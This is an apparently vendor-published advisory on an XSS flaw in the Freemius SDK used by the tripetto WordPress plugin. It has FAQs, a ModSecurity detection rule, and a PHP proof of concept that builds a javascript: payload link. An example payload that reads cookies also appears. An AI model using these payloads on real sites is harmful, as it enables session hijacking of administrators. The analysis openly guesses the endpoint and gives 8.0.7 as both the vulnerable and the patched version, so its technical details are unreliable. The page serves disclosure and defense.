What is CVE-2024-13362?

CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Freemius SDK used by the tripetto plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.

Who is affected by this vulnerability?

WordPress installations using the tripetto plugin version 8.0.7 or earlier and the Freemius SDK version 2.10.1 or earlier are affected. Administrators should check their installed versions to determine if they are vulnerable.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the tripetto plugin and the Freemius SDK in your WordPress installation. If you are using version 8.0.7 or earlier of tripetto or version 2.10.1 or earlier of the Freemius SDK, your site is at risk.

What are the potential risks of this vulnerability?

The successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the victim’s browser, resulting in session hijacking, unauthorized actions, or phishing attacks. The risk is heightened in multi-site environments or if an administrator is targeted.

How can I remediate this vulnerability?

To remediate this vulnerability, update the tripetto plugin to the latest version that includes the fix. Additionally, ensure that any use of the ‘url’ parameter is properly sanitized using functions like encodeURIComponent() in JavaScript or esc_url() in PHP.

What does a CVSS score of 6.1 mean?

A CVSS score of 6.1 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it is still significant enough to warrant prompt attention and remediation to prevent potential exploitation.

What is reflected DOM-based XSS?

Reflected DOM-based XSS occurs when user input is reflected in the web page’s DOM without proper sanitization, allowing attackers to inject malicious scripts. This type of XSS is executed client-side and does not require server-side processing.

How does the proof of concept demonstrate the vulnerability?

The proof of concept illustrates how an attacker can craft a malicious URL with a JavaScript payload in the ‘url’ parameter. When a victim clicks the link, the payload executes in their browser, confirming the XSS vulnerability.

What coding practices can prevent this vulnerability?

Developers should always sanitize user input and escape output before using it in JavaScript contexts. Using functions like esc_js() in PHP and encodeURIComponent() in JavaScript can help mitigate XSS risks.

Are there any known exploits for this vulnerability?

While specific exploits may not be publicly documented, the nature of the vulnerability allows for potential exploitation through social engineering techniques, where attackers trick users into clicking malicious links.

What should I do if I cannot update the plugin immediately?

If an immediate update is not possible, consider disabling the tripetto plugin or implementing additional security measures such as web application firewalls (WAF) to help mitigate the risk of exploitation.

How can I stay informed about vulnerabilities like this?

To stay informed, regularly check security advisories from WordPress, subscribe to security mailing lists, and follow reputable security blogs that report on vulnerabilities affecting WordPress plugins and themes.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : May 4, 2026

CVE-2024-13362: Freemius <= 2.10.1 – Reflected DOM-Based Cross-Site Scripting via url Parameter (tripetto)

CVE ID CVE-2024-13362

Plugin tripetto

Severity Medium (CVSS 6.1)

CWE 79

Vulnerable Version 8.0.7

Patched Version —

Disclosed April 29, 2026

Analysis Overview

Atomic Edge analysis of CVE-2024-13362 (metadata-based):
This is a reflected DOM-based cross-site scripting vulnerability in the Freemius framework library used by multiple WordPress plugins and themes, including the “tripetto” plugin. The vulnerability exists in versions up to 2.10.1 of the Freemius SDK and specifically in the “tripetto” plugin up to version 8.0.7. The CVSS score is 6.1 (Medium) with the vector AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N, indicating a network-exploitable attack requiring user interaction, with low impact to confidentiality and integrity.

Root Cause:
Based on the CWE-79 classification and the description, the root cause is improper neutralization of input in the ‘url’ parameter. The Freemius SDK or the plugin code passes user-supplied input from the ‘url’ parameter directly into JavaScript DOM manipulation without adequate sanitization or output escaping. This is a classic DOM-based XSS where the payload never reaches the server but is executed client-side via JavaScript functions such as innerHTML, document.write, or eval. Atomic Edge analysis infers this from the CWE and description; no source code was available for confirmation.

Exploitation:
An unauthenticated attacker crafts a malicious link containing a JavaScript payload in the ‘url’ parameter. For the “tripetto” plugin, the vulnerable endpoint is likely an AJAX handler or a Freemius connectivity check page that reflects the ‘url’ parameter into a JavaScript context. The attack vector is social engineering: the attacker sends the crafted link to a logged-in user. When the user clicks the link, the payload executes in their browser, allowing the attacker to perform actions on behalf of the victim, such as stealing session cookies or modifying page content. A typical payload might be: url=https://attacker.com/”?alert(document.cookie) or a data URI with JavaScript.

Remediation:
The fix requires properly sanitizing the ‘url’ parameter before using it in DOM manipulation. The developer should use JavaScript’s encodeURIComponent() or similar client-side encoding, and server-side should validate the URL against a whitelist of allowed domains or use WordPress’s built-in esc_url() function. The patched version 8.0.7 (or 2.10.1 of the SDK) likely implements proper output escaping using esc_js() or wp_kses() in PHP, and avoids direct concatenation of user input into JavaScript contexts.

Impact:
Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim’s browser. This can lead to session hijacking, defacement of the admin dashboard, phishing attacks, or unauthorized actions performed on behalf of the victim. The scope change in the CVSS vector (S:C) indicates that the vulnerable component is different from the resource impacted, meaning the XSS can affect the entire WordPress installation beyond the plugin’s own page. This can be particularly damaging in multi-site environments or when an administrator is targeted.

ModSecurity Protection Against This CVE

Here you will find our ModSecurity compatible rule to protect against this particular CVE.

ModSecurity

# Atomic Edge WAF Rule - CVE-2024-13362 (metadata-based)
# Blocks reflected XSS in the 'url' parameter for Freemius AJAX endpoints
# Targets the common AJAX handler pattern used by vulnerable plugins (e.g., tripetto)
SecRule REQUEST_URI "@beginsWith /wp-admin/admin-ajax.php" 
  "id:20261994,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter in Freemius',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:action "@pm tripetto_freemius_check" "chain"
    SecRule ARGS:url "@rx (?:javascript|data:|vbscript|<script|on[a-z]+=|&#x?[0-9a-fA-F]{2,};)" 
      "t:lowercase,t:urlDecode"

# Alternative rule for direct page endpoints that reflect the url parameter (if AJAX is not used)
SecRule REQUEST_URI "@rx /wp-content/plugins/tripetto/.*freemius.*.php$" 
  "id:20261995,phase:2,deny,status:403,chain,msg:'CVE-2024-13362 Reflected XSS via url parameter in Freemius',severity:'CRITICAL',tag:'CVE-2024-13362'"
  SecRule ARGS:url "@rx (?:javascript|data:|vbscript|<script|on[a-z]+=|&#x?[0-9a-fA-F]{2,};)" 
    "t:lowercase,t:urlDecode"

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept (metadata-based)
// CVE-2024-13362 - Freemius <= 2.10.1 - Reflected DOM-Based Cross-Site Scripting via url Parameter

// This PoC demonstrates the reflected XSS vulnerability in the Freemius SDK used by the 'tripetto' plugin.
// The vulnerable endpoint is likely the Freemius connectivity check AJAX handler or a page that reflects the 'url' parameter.
// Since no source code is available, we assume the parameter is passed to a JavaScript DOM API without sanitization.

$target_url = 'http://example.com'; // CHANGE THIS to the target WordPress site

// Construct the malicious link with a JavaScript payload in the 'url' parameter.
// The payload will execute when the victim's browser processes the URL.
// We use a simple alert to confirm XSS, but real attackers would use cookie theft or other malicious actions.
$payload = 'javascript:alert(document.domain)';
$vulnerable_endpoint = '/wp-admin/admin-ajax.php?action=tripetto_freemius_check&url=' . urlencode($payload);

$full_url = $target_url . $vulnerable_endpoint;

echo "[+] Atomic Edge PoC for CVE-2024-13362n";
echo "[+] Target: $target_urln";
echo "[+] Crafted malicious URL:n";
echo $full_url . "nn";
echo "[+] To exploit: Send this link to a logged-in admin. When clicked, the XSS payload executes.n";

// Optional: Send the request via cURL to verify the endpoint exists and reflects the parameter.
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $full_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HEADER, false);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 200) {
    echo "[+] Endpoint responded with HTTP 200. Check if the URL parameter is reflected in the response.n";
    echo "[+] Response snippet:n";
    echo substr($response, 0, 500) . "n";
} else {
    echo "[-] HTTP $http_code received. The endpoint might require authentication or different parameters.n";
    echo "[-] This PoC is metadata-based; actual exploitation may require adjustments.n";
}

Frequently Asked Questions

What is CVE-2024-13362?
Overview of the vulnerability
CVE-2024-13362 is a reflected DOM-based cross-site scripting (XSS) vulnerability found in the Freemius SDK used by the tripetto plugin for WordPress. It allows unauthenticated attackers to inject arbitrary scripts via the ‘url’ parameter due to insufficient input sanitization.
Who is affected by this vulnerability?
Identifying vulnerable users
WordPress installations using the tripetto plugin version 8.0.7 or earlier and the Freemius SDK version 2.10.1 or earlier are affected. Administrators should check their installed versions to determine if they are vulnerable.
How can I check if my site is vulnerable?
Verifying plugin versions
To check for vulnerability, verify the version of the tripetto plugin and the Freemius SDK in your WordPress installation. If you are using version 8.0.7 or earlier of tripetto or version 2.10.1 or earlier of the Freemius SDK, your site is at risk.
What are the potential risks of this vulnerability?
Understanding the impact
The successful exploitation of this vulnerability can lead to arbitrary JavaScript execution in the victim’s browser, resulting in session hijacking, unauthorized actions, or phishing attacks. The risk is heightened in multi-site environments or if an administrator is targeted.
How can I remediate this vulnerability?
Steps to fix the issue
To remediate this vulnerability, update the tripetto plugin to the latest version that includes the fix. Additionally, ensure that any use of the ‘url’ parameter is properly sanitized using functions like encodeURIComponent() in JavaScript or esc_url() in PHP.
What does a CVSS score of 6.1 mean?
Interpreting the severity rating
A CVSS score of 6.1 indicates a medium severity vulnerability. This suggests that while the vulnerability is not critical, it is still significant enough to warrant prompt attention and remediation to prevent potential exploitation.
What is reflected DOM-based XSS?
Explaining the attack vector
Reflected DOM-based XSS occurs when user input is reflected in the web page’s DOM without proper sanitization, allowing attackers to inject malicious scripts. This type of XSS is executed client-side and does not require server-side processing.
How does the proof of concept demonstrate the vulnerability?
Understanding the PoC
The proof of concept illustrates how an attacker can craft a malicious URL with a JavaScript payload in the ‘url’ parameter. When a victim clicks the link, the payload executes in their browser, confirming the XSS vulnerability.
What coding practices can prevent this vulnerability?
Best practices for developers
Developers should always sanitize user input and escape output before using it in JavaScript contexts. Using functions like esc_js() in PHP and encodeURIComponent() in JavaScript can help mitigate XSS risks.
Are there any known exploits for this vulnerability?
Current exploitation status
While specific exploits may not be publicly documented, the nature of the vulnerability allows for potential exploitation through social engineering techniques, where attackers trick users into clicking malicious links.
What should I do if I cannot update the plugin immediately?
Temporary mitigation strategies
If an immediate update is not possible, consider disabling the tripetto plugin or implementing additional security measures such as web application firewalls (WAF) to help mitigate the risk of exploitation.
How can I stay informed about vulnerabilities like this?
Keeping up with security updates
To stay informed, regularly check security advisories from WordPress, subscribe to security mailing lists, and follow reputable security blogs that report on vulnerabilities affecting WordPress plugins and themes.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations